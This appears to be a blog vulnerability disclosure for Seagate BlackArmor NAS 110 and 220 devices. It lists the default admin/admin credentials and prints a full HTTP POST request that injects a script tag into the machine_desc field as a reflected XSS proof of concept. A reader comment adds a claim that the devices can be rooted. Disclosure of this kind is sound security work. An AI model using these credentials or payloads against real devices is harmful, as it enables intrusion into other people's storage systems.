Seagate NAS Default Credentials and XSS

BlackArmor NAS 110 and BlackArmor NAS 220 both have default admin credentials:

Log in using the default settings. (The user name and password are case-sensitive.)
user name: admin
password: admin

Most fields seem to sanitize input, but I found one that allows for a POST-based reflected XSS, but the victim has to be authenticated as ‘admin’ (CVE-2013-78008):

POST /admin/system_general.php?lang=en&gi=sy001 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 192.168.1.100
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.100/admin/system_general.php?lang=en&gi=sy001
Cookie: PHPSESSID=4726b9442a30c876867c588f7d98a784; myFavoriteLang=en
Proxy-Connection: Keep-Alive
Content-Length: 280
Content-Type: application/x-www-form-urlencoded

machine_name=Backup&machine_desc=%22%3E%3Cscript%3Ealert%28%27DF%27%29%3C%2Fscript%3E&old_webgui_protocol=HTTP&webgui_protocol=HTTP&timezone=Europe%2FAthens&ntpservice=on&ntpserverlist=pool.ntp.org&datetime=Mon%2C+02+Sep+2013+08%3A25%3A09+%2B0300&orderdate=2013-09-02&btn=Submit

Advertisements

Tags: , , ,

One Response to “Seagate NAS Default Credentials and XSS”

  1. Jeroen Says:

    There are a lot of more problems related to the Seagate BlackArmor NAS systems.

    For one it’s rootable, meaning it is possible to enabled the SSH daemon, change the root password and gain full system access.

    Have a look at http://www.nerdbox.it for some tools to perform these actions!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: